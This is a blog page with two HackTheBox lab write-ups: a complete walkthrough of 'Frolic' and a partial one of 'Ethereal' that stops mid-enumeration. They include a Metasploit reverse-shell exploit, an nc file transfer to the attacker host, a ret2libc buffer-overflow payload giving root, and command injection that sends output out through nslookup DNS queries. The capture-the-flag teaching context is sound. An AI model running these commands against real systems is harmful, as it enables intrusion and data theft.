1n4r1.github.io

© 2024. All rights reserved.

Hackthebox Frolic Writeup

24 Mar 2019


Explanation

Hackthebox is a website which has bunch of vulnerable machines in its own VPN. This is a write-up of machine “Frolic” on that website.

Solution

1. Initial Enumeration

Port Scanning:

root@kali:~# nmap -p- 10.10.10.111 -sV -sC
Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-15 09:44 EEST
Nmap scan report for 10.10.10.111
Host is up (0.035s latency).
Not shown: 65530 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 87:7b:91:2a:0f:11:b6:57:1e:cb:9f:77:cf:35:e2:21 (RSA)
|   256 b7:9b:06:dd:c2:5e:28:44:78:41:1e:67:7d:1e:b7:62 (ECDSA)
|_  256 21:cf:16:6d:82:a4:30:c3:c6:9c:d7:38:ba:b5:02:b0 (ED25519)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
1880/tcp open  http        Node.js (Express middleware)
|_http-title: Node-RED
9999/tcp open  http        nginx 1.10.3 (Ubuntu)
|_http-server-header: nginx/1.10.3 (Ubuntu)
|_http-title: Welcome to nginx!
Service Info: Host: FROLIC; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -1h55m15s, deviation: 3h10m30s, median: -5m16s
|_nbstat: NetBIOS name: FROLIC, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: frolic
|   NetBIOS computer name: FROLIC\x00
|   Domain name: \x00
|   FQDN: frolic
|_  System time: 2018-10-15T12:10:26+05:30
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2018-10-15 09:40:26
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 85.70 seconds

Gobuster HTTP port 1880:

root@kali:~# gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -s '200,204,301,302,403' -u http://10.10.10.111:1880 -x .html,.php

=====================================================
Gobuster v2.0.1              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.111:1880/
[+] Threads      : 10
[+] Wordlist     : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,403
[+] Extensions   : html,php
[+] Timeout      : 10s
=====================================================
2019/03/22 15:21:35 Starting gobuster
=====================================================
/red (Status: 301)
/vendor (Status: 301)
=====================================================
2019/03/22 16:05:09 Finished
=====================================================

Gobuster HTTP port 9999:

root@kali:~# gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -s '200,204,301,302,403' -u http://10.10.10.111:9999 -x .html,.php

=====================================================
Gobuster v2.0.1              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.111:9999/
[+] Threads      : 10
[+] Wordlist     : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,403
[+] Extensions   : html,php
[+] Timeout      : 10s
=====================================================
2019/03/22 14:35:52 Starting gobuster
=====================================================
/admin (Status: 301)
/test (Status: 301)
/dev (Status: 301)
/backup (Status: 301)
/loop (Status: 301)
=====================================================
2019/03/22 15:18:58 Finished
=====================================================

2. Getting User

We can find a login page in “/admin” port 9999.
placeholder This login console is controlled by “/admin/js/login.js” and we can find the password “superduperlooperpassword_lol”.

root@kali:~# curl http://10.10.10.111:9999/admin/js/login.js
var attempt = 3; // Variable to count number of attempts.
// Below function Executes on click of login button.
function validate(){
var username = document.getElementById("username").value;
var password = document.getElementById("password").value;
if ( username == "admin" && password == "superduperlooperpassword_lol"){
alert ("Login successfully");
window.location = "success.html"; // Redirecting to other page.
return false;
}
else{
attempt --;// Decrementing by one.
alert("You have left "+attempt+" attempt;");
// Disabling fields after 3 attempts.
if( attempt == 0){
document.getElementById("username").disabled = true;
document.getElementById("password").disabled = true;
document.getElementById("submit").disabled = true;
return false;
}
}
}

In the redirected page “/admin/success.html”, there is a “encrypted message” placeholder

root@kali:~# cat success.html
..... ..... ..... .!?!! .?... ..... ..... ...?. ?!.?. ..... ..... ..... ..... ..... ..!.? ..... ..... .!?!! .?... ..... ..?.? !.?.. ..... ..... ....! ..... ..... .!.?. ..... .!?!! .?!!! !!!?. ?!.?! !!!!! !...! ..... ..... .!.!! !!!!! !!!!! !!!.? ..... ..... ..... ..!?! !.?!! !!!!! !!!!! !!!!? .?!.? !!!!! !!!!! !!!!! .?... ..... ..... ....! ?!!.? ..... ..... ..... .?.?! .?... ..... ..... ...!. !!!!! !!.?. ..... .!?!! .?... ...?. ?!.?. ..... ..!.? ..... ..!?! !.?!! !!!!? .?!.? !!!!! !!!!. ?.... ..... ..... ...!? !!.?! !!!!! !!!!! !!!!! ?.?!. ?!!!! !!!!! !!.?. ..... ..... ..... .!?!! .?... ..... ..... ...?. ?!.?. ..... !.... ..... ..!.! !!!!! !.!!! !!... ..... ..... ....! .?... ..... ..... ....! ?!!.? !!!!! !!!!! !!!!! !?.?! .?!!! !!!!! !!!!! !!!!! !!!!! .?... ....! ?!!.? ..... .?.?! .?... ..... ....! .?... ..... ..... ..!?! !.?.. ..... ..... ..?.? !.?.. !.?.. ..... ..!?! !.?.. ..... .?.?! .?... .!.?. ..... .!?!! .?!!! !!!?. ?!.?! !!!!! !!!!! !!... ..... ...!. ?.... ..... !?!!. ?!!!! !!!!? .?!.? !!!!! !!!!! !!!.? ..... ..!?! !.?!! !!!!? .?!.? !!!.! !!!!! !!!!! !!!!! !.... ..... ..... ..... !.!.? ..... ..... .!?!! .?!!! !!!!! !!?.? !.?!! !.?.. ..... ....! ?!!.? ..... ..... ?.?!. ?.... ..... ..... ..!.. ..... ..... .!.?. ..... ...!? !!.?! !!!!! !!?.? !.?!! !!!.? ..... ..!?! !.?!! !!!!? .?!.? !!!!! !!.?. ..... ...!? !!.?. ..... ..?.? !.?.. !.!!! !!!!! !!!!! !!!!! !.?.. ..... ..!?! !.?.. ..... .?.?! .?... .!.?. ..... ..... ..... .!?!! .?!!! !!!!! !!!!! !!!?. ?!.?! !!!!! !!!!! !!.!! !!!!! ..... ..!.! !!!!! !.?.

This does not make any sense. However, we can use This website to interpret this encrypted code. placeholder

We got an interesting information. Let’s try /asdiSIAJJ0QWE9JAS. placeholder

There is a bese64 encoded message.
We can figure out what’s this message by following command.

root@kali:~# echo -n UEsDBBQACQAIAMOJN00j/lsUsAAAAGkCAAAJABwAaW5kZXgucGhwVVQJAAOFfKdbhXynW3V4CwABBAAAAAAEAAAAAF5E5hBKn3OyaIopmhuVUPBuC6m/U3PkAkp3GhHcjuWgNOL22Y9r7nrQEopVyJbsK1i6f+BQyOES4baHpOrQu+J4XxPATolb/Y2EU6rqOPKD8uIPkUoyU8cqgwNE0I19kzhkVA5RAmveEMrX4+T7al+fi/kY6ZTAJ3h/Y5DCFt2PdL6yNzVRrAuaigMOlRBrAyw0tdliKb40RrXpBgn/uoTjlurp78cmcTJviFfUnOM5UEsHCCP+WxSwAAAAaQIAAFBLAQIeAxQACQAIAMOJN00j/lsUsAAAAGkCAAAJABgAAAAAAAEAAACkgQAAAABpbmRleC5waHBVVAUAA4V8p1t1eAsAAQQAAAAABAAAAABQSwUGAAAAAAEAAQBPAAAAAwEAAAAA | base64 -d > b64file

root@kali:~# file b64file
b64file: Zip archive data, at least v2.0 to extract

Sounds like we got a .zip file. This has password protection but the pass is simply guessable “password”.

root@kali:~# unzip b64file
Archive:  b64file
[b64file] index.php password:  # type "password"
  inflating: index.php

The contents of index.php is hex value.

root@kali:~# cat index.php 
4b7973724b7973674b7973724b7973675779302b4b7973674b7973724b7973674b79737250463067506973724b7973674b7934744c5330674c5330754b7973674b7973724b7973674c6a77720d0a4b7973675779302b4b7973674b7a78645069734b4b797375504373674b7974624c5434674c53307450463067506930744c5330674c5330754c5330674c5330744c5330674c6a77724b7973670d0a4b317374506973674b79737250463067506973724b793467504373724b3173674c5434744c53304b5046302b4c5330674c6a77724b7973675779302b4b7973674b7a7864506973674c6930740d0a4c533467504373724b3173674c5434744c5330675046302b4c5330674c5330744c533467504373724b7973675779302b4b7973674b7973385854344b4b7973754c6a776743673d3d0d0a

By using Burp Suite, we can decode this code as ASCII character. placeholder

root@kali:~# cat frolic.b64 
KysrKysgKysrKysgWy0+KysgKysrKysgKysrPF0gPisrKysgKy4tLS0gLS0uKysgKysrKysgLjwr
KysgWy0+KysgKzxdPisKKysuPCsgKytbLT4gLS0tPF0gPi0tLS0gLS0uLS0gLS0tLS0gLjwrKysg
K1stPisgKysrPF0gPisrKy4gPCsrK1sgLT4tLS0KPF0+LS0gLjwrKysgWy0+KysgKzxdPisgLi0t
LS4gPCsrK1sgLT4tLS0gPF0+LS0gLS0tLS4gPCsrKysgWy0+KysgKys8XT4KKysuLjwgCg==

Sounds like this text is base64 encoded. Try to decode.

root@kali:~# cat frolic.b64 | base64 -d
+++++ +++++ [->++ +++++ +++<] >++++ +.--- --.++ +++++ .<+++ [->++ +<]>+
++.<+ ++[-> ---<] >---- --.-- ----- .<+++ +[->+ +++<] >+++. <+++[ ->---
<]>-- .<+++ [->++ +<]>+ .---. <+++[ ->--- <]>-- ----. <++++ [->++ ++<]>
++..<

Then, we got another brainfuck code. Again, try to use This website. placeholder

We can login to playsms which is in “/playsms”. This information is found in”/dev/backup”. placeholder placeholder

The credential is “admin:idkwhatispass”. placeholder

searchsploit:

root@kali:~# searchsploit playsms
---------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                          |  Path
                                                                                        | (/usr/share/exploitdb/)
---------------------------------------------------------------------------------------- ----------------------------------------
PlaySMS - 'import.php' (Authenticated) CSV File Upload Code Execution (Metasploit)      | exploits/php/remote/44598.rb
PlaySMS 1.4 - '/sendfromfile.php' Remote Code Execution / Unrestricted File Upload      | exploits/php/webapps/42003.txt
PlaySMS 1.4 - 'import.php' Remote Code Execution                                        | exploits/php/webapps/42044.txt
PlaySMS 1.4 - 'sendfromfile.php?Filename' (Authenticated) 'Code Execution (Metasploit)  | exploits/php/remote/44599.rb
PlaySMS 1.4 - Remote Code Execution                                                     | exploits/php/webapps/42038.txt
PlaySms 0.7 - SQL Injection                                                             | exploits/linux/remote/404.pl
PlaySms 0.8 - 'index.php' Cross-Site Scripting                                          | exploits/php/webapps/26871.txt
PlaySms 0.9.3 - Multiple Local/Remote File Inclusions                                   | exploits/php/webapps/7687.txt
PlaySms 0.9.5.2 - Remote File Inclusion                                                 | exploits/php/webapps/17792.txt
PlaySms 0.9.9.2 - Cross-Site Request Forgery                                            | exploits/php/webapps/30177.txt
---------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

This time, we can use the exploit “PlaySMS - ‘import.php’ (Authenticated) CSV File Upload Code Execution (Metasploit)”

msf5 > use exploit/multi/http/playsms_uploadcsv_exec 
msf5 exploit(multi/http/playsms_uploadcsv_exec) > set rhosts 10.10.10.111
rhosts => 10.10.10.111
msf5 exploit(multi/http/playsms_uploadcsv_exec) > set lhost tun0
lhost => tun0
msf5 exploit(multi/http/playsms_uploadcsv_exec) > set rport 9999
rport => 9999
msf5 exploit(multi/http/playsms_uploadcsv_exec) > set targeturi /playsms/
targeturi => /playsms/
msf5 exploit(multi/http/playsms_uploadcsv_exec) > set password idkwhatispass
password => idkwhatispass
msf5 exploit(multi/http/playsms_uploadcsv_exec) > run

[*] Started reverse TCP handler on 10.10.14.23:4444 
[+] Authentication successful: admin:idkwhatispass
[*] Sending stage (38247 bytes) to 10.10.10.111
[*] Meterpreter session 1 opened (10.10.14.23:4444 -> 10.10.10.111:38400) at 2019-03-24 09:18:33 +0200

meterpreter > shell
Process 6996 created.
Channel 0 created.
cd /home
ls -la
total 16
drwxr-xr-x  4 root  root  4096 Sep 23 17:56 .
drwxr-xr-x 22 root  root  4096 Sep 23 17:16 ..
drwxr-xr-x  3 ayush ayush 4096 Sep 25 02:00 ayush
drwxr-xr-x  7 sahay sahay 4096 Sep 25 02:45 sahay
cd ayush
ls -la
total 36
drwxr-xr-x 3 ayush ayush 4096 Sep 25 02:00 .
drwxr-xr-x 4 root  root  4096 Sep 23 17:56 ..
-rw------- 1 ayush ayush 2781 Sep 25 02:47 .bash_history
-rw-r--r-- 1 ayush ayush  220 Sep 23 17:56 .bash_logout
-rw-r--r-- 1 ayush ayush 3771 Sep 23 17:56 .bashrc
drwxrwxr-x 2 ayush ayush 4096 Sep 25 02:43 .binary
-rw-r--r-- 1 ayush ayush  655 Sep 23 17:56 .profile
-rw------- 1 ayush ayush  965 Sep 25 01:58 .viminfo
-rwxr-xr-x 1 ayush ayush   33 Sep 25 01:58 user.txt
cat user.txt
2ab95909cf509f85a6f476b59a0c2fe0

3. Getting Root

We can find an interesting binary which has SUID.

find / -perm -4000 2>/dev/null
/sbin/mount.cifs
/bin/mount
/bin/ping6
/bin/fusermount
/bin/ping
/bin/umount
/bin/su
/bin/ntfs-3g
/home/ayush/.binary/rop
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/newuidmap
/usr/bin/pkexec
/usr/bin/at
/usr/bin/sudo
/usr/bin/newgidmap
/usr/bin/chsh
/usr/bin/chfn
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/snapd/snap-confine
/usr/lib/eject/dmcrypt-get-device
/usr/lib/i386-linux-gnu/lxc/lxc-user-nic
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign

This binary “rop” takes 1 argument.

./rop
[*] Usage: program <message>
hoge
/bin/sh: 14: hoge: not found

We can confirm that putting a long argument causes a segmentation error.

./rop aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Segmentation fault (core dumped)

Besides, we can figure out ASLA is disabled.

cat /proc/sys/kernel/randomize_va_space
0

This means “rop” has buffer overflow exploit and we can take advantage of it to execute arbitraty command.
At first, we have to download the binary.

# on localhost
root@kali:~# nc -nlvp 443 > rop
listening on [any] 443 ...

# on 10.10.10.111
nc 10.10.14.23 443 < /home/ayush/.binary/rop

Then we have to figure out the length of buffer.
Creating payload:

root@kali:~# /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 100
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A

By debugging with gdb, we can see the execution failed because it tried to jump to memory address “0x62413762”

root@kali:~# gdb rop
GNU gdb (Debian 8.2.1-2) 8.2.1
Copyright (C) 2018 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
    <http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from rop...(no debugging symbols found)...done.
(gdb) run Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A
Starting program: /root/rop Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A

Program received signal SIGSEGV, Segmentation fault.
0x62413762 in ?? ()

This address “0x62413762” is from our payload. By using “pattern_offset.rb”, we know the size of buffer is 52.

root@kali:~# /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 0x62413762
[*] Exact match at offset 52

Then, we need information about where is the address of “libc.so.6”

ldd rop
linux-gate.so.1 =>  (0xb7fda000)
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7e19000)
/lib/ld-linux.so.2 (0xb7fdb000)

Then, we have to figure out where is the address of “/bin/sh”, “system”, and “exit”.

# address of "/bin/sh"
strings -tx /lib/i386-linux-gnu/libc.so.6 | grep "/bin/sh"
 15ba0b /bin/sh

# address of system
readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system
   245: 00112f20    68 FUNC    GLOBAL DEFAULT   13 svcerr_systemerr@@GLIBC_2.0
   627: 0003ada0    55 FUNC    GLOBAL DEFAULT   13 __libc_system@@GLIBC_PRIVATE
  1457: 0003ada0    55 FUNC    WEAK   DEFAULT   13 system@@GLIBC_2.0

# address of exit
readelf -s /lib/i386-linux-gnu/libc.so.6 | grep exit
   112: 0002edc0    39 FUNC    GLOBAL DEFAULT   13 __cxa_at_quick_exit@@GLIBC_2.10
   141: 0002e9d0    31 FUNC    GLOBAL DEFAULT   13 exit@@GLIBC_2.0
   450: 0002edf0   197 FUNC    GLOBAL DEFAULT   13 __cxa_thread_atexit_impl@@GLIBC_2.18
   558: 000b07c8    24 FUNC    GLOBAL DEFAULT   13 _exit@@GLIBC_2.0
   616: 00115fa0    56 FUNC    GLOBAL DEFAULT   13 svc_exit@@GLIBC_2.0
   652: 0002eda0    31 FUNC    GLOBAL DEFAULT   13 quick_exit@@GLIBC_2.10
   876: 0002ebf0    85 FUNC    GLOBAL DEFAULT   13 __cxa_atexit@@GLIBC_2.1.3
  1046: 0011fb80    52 FUNC    GLOBAL DEFAULT   13 atexit@GLIBC_2.0
  1394: 001b2204     4 OBJECT  GLOBAL DEFAULT   33 argp_err_exit_status@@GLIBC_2.1
  1506: 000f3870    58 FUNC    GLOBAL DEFAULT   13 pthread_exit@@GLIBC_2.0
  2108: 001b2154     4 OBJECT  GLOBAL DEFAULT   33 obstack_exit_failure@@GLIBC_2.0
  2263: 0002e9f0    78 FUNC    WEAK   DEFAULT   13 on_exit@@GLIBC_2.0
  2406: 000f4c80     2 FUNC    GLOBAL DEFAULT   13 __cyg_profile_func_exit@@GLIBC_2.2

According to these information above, our target address is

system:  0xb7e19000 + 0x0003ada0 = 0xb7e53da0
exit:    0xb7e19000 + 0x0002e9d0 = 0xb7e479d0
/bin/sh: 0xb7e19000 + 0x15ba0b   = 0xb7f74a0b

To obtain root shell, execute ./rop with these payloads

./rop `python -c "print 'A'*52 + '\xa0\x3d\xe5\xb7' + '\xd0\x79\xe4\xb4' + '\x0b\x4a\xf7\xb7'"`
id
uid=0(root) gid=33(www-data) groups=33(www-data)

As always, root.txt is in the directory /root.

cat /root/root.txt
85d3fdf03f969892538ba9a731826222

Hackthebox Ethereal Writeup

22 Mar 2019


Environment

  • Host OS: Kali linux 2018.4
  • Guest OS: Windows 7 Service Pack 1
  • Virtualization: Virtualbox 5.2.22
  • MSI builder: Wix Toolset v3.11.1

Explanation:

Hackthebox is a website which has bunch of vulnerable machines in its own VPN. This is a write-up of “Ethereal”.

Solution:

1. Initial Enumeration

TCP Port scanning:

root@kali:~# nmap -p- 10.10.10.106 -sV -sC
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-07 19:56 EET
Stats: 0:20:29 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 75.77% done; ETC: 20:23 (0:06:33 remaining)
Nmap scan report for 10.10.10.106
Host is up (0.12s latency).
Not shown: 65532 filtered ports
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV IP 172.16.249.135 is not the same as 10.10.10.106
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp   open  http    Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Ethereal
8080/tcp open  http    Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Bad Request
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1628.08 seconds

FTP enumeration:

root@kali:~# ftp 10.10.10.106
Connected to 10.10.10.106.
220 Microsoft FTP Service
Name (10.10.10.106:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
07-10-18  09:03PM       <DIR>          binaries
09-02-09  08:58AM                 4122 CHIPSET.txt
01-12-03  08:58AM              1173879 DISK1.zip
01-22-11  08:58AM               182396 edb143en.exe
01-18-11  11:05AM                98302 FDISK.zip
07-10-18  08:59PM       <DIR>          New folder
07-10-18  09:38PM       <DIR>          New folder (2)
07-09-18  09:23PM       <DIR>          subversion-1.10.0
11-12-16  08:58AM                 4126 teamcity-server-log4j.xml
226 Transfer complete.

gobuster HTTP:

root@kali:~# gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -s '200,204,301,302,403' -u http://10.10.10.106 -x aspx

=====================================================
Gobuster v2.0.0              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.106/
[+] Threads      : 10
[+] Wordlist     : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,403
[+] Extensions   : aspx
[+] Timeout      : 10s
=====================================================
2019/03/07 20:28:10 Starting gobuster
=====================================================
/default.aspx (Status: 200)
/Default.aspx (Status: 200)
/corp (Status: 301)
/Corp (Status: 301)
/DEFAULT.aspx (Status: 200)
/CORP (Status: 301)
=====================================================
2019/03/07 22:21:57 Finished
=====================================================

gobuster HTTP /corp:

root@kali:~# gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -s '200,204,301,302,403' -u http://10.10.10.106/corp -x aspx

=====================================================
Gobuster v2.0.0              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.106/corp/
[+] Threads      : 10
[+] Wordlist     : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,403
[+] Extensions   : aspx
[+] Timeout      : 10s
=====================================================
2019/03/07 22:32:06 Starting gobuster
=====================================================
/img (Status: 301)
/login (Status: 301)
/help (Status: 301)
/css (Status: 301)
/Help (Status: 301)
/Login (Status: 301)
/js (Status: 301)
/console (Status: 301)
/IMG (Status: 301)
/CSS (Status: 301)
/Img (Status: 301)
/JS (Status: 301)
/Console (Status: 301)
/HELP (Status: 301)
/LogIn (Status: 301)
/LOGIN (Status: 301)
=====================================================
2019/03/08 00:27:06 Finished
=====================================================

2. Getting User

As always, try to enumerate HTTP.
If we click on “MENU”, we can find an access to admin console. placeholder

Clicking on “Menu” again and “PING” redirects us to ethreal.htb:8080.
We have to add following line in “/etc/hosts”.

10.10.10.106 ethereal.htb

placeholder placeholder

However, since we don’t have any credentials right now, continue our enumeration.

By FTP enumeration, We could find some interesting zip files.
The content of these zip files don’t have any extensions.

root@kali:~# unzip DISK1.zip
Archive:  DISK1.zip
  inflating: DISK1
  inflating: DISK2
root@kali:~# unzip FDISK.zip
Archive:  FDISK.zip
  inflating: FDISK

By executing file command, we can figure out these are disk images.

root@kali:~# file DISK1
DISK1: DOS/MBR boot sector, code offset 0x3c+2, OEM-ID "MSDOS5.0", root entries 224, sectors 2880 (volumes <=32 MB), sectors/FAT 9, sectors/track 18, serial number 0x8c271e81, unlabeled, FAT (12 bit), followed by FAT
root@kali:~# file DISK2
DISK2: DOS/MBR boot sector, code offset 0x3c+2, OEM-ID "MSDOS5.0", root entries 224, sectors 2880 (volumes <=32 MB), sectors/FAT 9, sectors/track 18, serial number 0x8c271fb9, unlabeled, FAT (12 bit), followed by FAT
root@kali:~# file FDISK
FDISK: DOS/MBR boot sector, code offset 0x3c+2, OEM-ID "MSDOS5.0", root entries 224, sectors 2880 (volumes <=32 MB), sectors/FAT 9, sectors/track 18, serial number 0x5843af55, unlabeled, FAT (12 bit), followed by FAT

If we check labels of each disk image, only “FDISK” has label “PASSWORDS”.

root@kali:~# e2label FDISK
e2label: Bad magic number in super-block while trying to open FDISK
FDISK contains a vfat file system labelled 'PASSWORDS'

To enumerate disk image, we have to mount the image file.
There is a directory “pbox” and

root@kali:~# mount -o loop FDISK /mnt/
root@kali:~# tree /mnt/
/mnt/
└── pbox
    ├── pbox.dat
    └── pbox.exe

1 directory, 2 files

We found 1 executable and 1 dat file.
Spin up a new windows VM with Virtualbox and try to execute it(wine didn’t work for me).
placeholder

It asked password but the password was easily guessable “password”.
Seeing each entry of pbox.exe, we can gather some interesting “credentials”. placeholder

List:

root@kali:~# cat strings.txt 
7oth3B@tC4v3!
alan@ethereal.co / P@ssword1!
alan2 / leaning!
watch3r
alan / Ex3cutiv3Backups
R3lea5eR3@dy#
Password8
!C414m17y57r1k3s4g41n!
alan53 / Ch3ck1ToU7

Try each patterns and we can find following credential to login ethereal.htb:8080

alan:!C414m17y57r1k3s4g41n!

placeholder

Sounds like “ping” command is executed internally.
Then, try OS command injection by putting some windows OS command in the textbox and submit.
We can easily figure out this command is available.

127.0.0.1 & ping 10.10.14.23

We can confirm the result by tcpdump

root@kali:~# tcpdump -i tun0 icmp
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on tun0, link-type RAW (Raw IP), capture size 262144 bytes
18:51:03.070436 IP ethereal.htb > kali: ICMP echo request, id 1, seq 17, length 40
18:51:03.070476 IP kali > ethereal.htb: ICMP echo reply, id 1, seq 17, length 40
18:51:04.222480 IP ethereal.htb > kali: ICMP echo request, id 1, seq 18, length 40
18:51:04.222522 IP kali > ethereal.htb: ICMP echo reply, id 1, seq 18, length 40
18:51:05.231877 IP ethereal.htb > kali: ICMP echo request, id 1, seq 19, length 40
18:51:05.231910 IP kali > ethereal.htb: ICMP echo reply, id 1, seq 19, length 40
18:51:06.875927 IP ethereal.htb > kali: ICMP echo request, id 1, seq 20, length 40
18:51:06.875966 IP kali > ethereal.htb: ICMP echo reply, id 1, seq 20, length 40

To send some information, we can enter following command and to receive it, responder is available.

127.0.0.1 & nslookup test 10.10.14.23
root@kali:~# responder -I tun0

~~~

[+] Listening for events...
[*] [DNS] Poisoned answer sent to: 10.10.10.106     Requested name: .test

We can try to execute os command and its output by following command.

# 10.10.14.23 & for /f %i in ('whoami') do nslookup %i 10.10.14.23
[+] Listening for events...
[*] [DNS] Poisoned answer sent to: 10.10.10.106     Requested name: .etherealalan

From now on, we can proceed our enumeration.
For example, current directory is “C:\windows\system32\inetsrv”

# 10.10.14.23 & for /f %i in ('cd') do nslookup %i 10.10.14.23
[+] Listening for events...
[*] [DNS] Poisoned answer sent to: 10.10.10.106     Requested name: .c.windowssystem32inetsrv

User enumeration:

# 10.10.14.23 & for /f %i in ('dir /B "C:\Users"') do nslookup %i 10.10.14.23
[*] [DNS] Poisoned answer sent to: 10.10.10.106     Requested name: .Administrator
[*] [DNS] Poisoned answer sent to: 10.10.10.106     Requested name: .alan
[*] [DNS] Poisoned answer sent to: 10.10.10.106     Requested name: .jorge
[*] [DNS] Poisoned answer sent to: 10.10.10.106     Requested name: .Public
[*] [DNS] Poisoned answer sent to: 10.10.10.106     Requested name: .rupal

Installed Program enumeration:

# 10.10.14.23 & for /f %i in ('dir /B "C:\Program Files (x86)"') do nslookup %i 10.10.14.23
[*] [DNS] Poisoned answer sent to: 10.10.10.106     Requested name: .Common
[*] [DNS] Poisoned answer sent to: 10.10.10.106     Requested name: .Internet
[*] [DNS] Poisoned answer sent to: 10.10.10.106     Requested name: .Microsoft
[*] [DNS] Poisoned answer sent to: 10.10.10.106     Requested name: .Microsoft
[*] [DNS] Poisoned answer sent to: 10.10.10.106     Requested name: .Microsoft.NET
[*] [DNS] Poisoned answer sent to: 10.10.10.106     Requested name: .MSBuild
[*] [DNS] Poisoned answer sent to: 10.10.10.106     Requested name: .OpenSSL.v1.1.0
[*] [DNS] Poisoned answer sent to: 10.10.10.106     Requested name: .Reference
[*] [DNS] Poisoned answer sent to: 10.10.10.106     Requested name: .Windows
[*] [DNS] Poisoned answer sent to: 10.10.10.106     Requested name: .Windows
[*] [DNS] Poisoned answer sent to: 10.10.10.106     Requested name: .Windows
[*] [DNS] Poisoned answer sent to: 10.10.10.106     Requested name: .Windows
[*] [DNS] Poisoned answer sent to: 10.10.10.106     Requested name: .Windows
[*] [DNS] Poisoned answer sent to: 10.10.10.106     Requested name: .Windows
[*] [DNS] Poisoned answer sent to: 10.10.10.106     Requested name: .Windows
[*] [DNS] Poisoned answer sent to: 10.10.10.106     Requested name: .WindowsPowerShell

Interesting information is that we have openssl v1.1.0 installed.

# 10.10.14.23 & netsh advfirewall firewall show rule name=all | findstr "Rule Name:" > C:\Users\Public\Desktop\Shortcuts\fw.txt
# 10.10.14.23 & for /f %i in ('dir /B "C:\Users\Public\Desktop\Shortcuts"') do nslookup %i 10.10.14.23
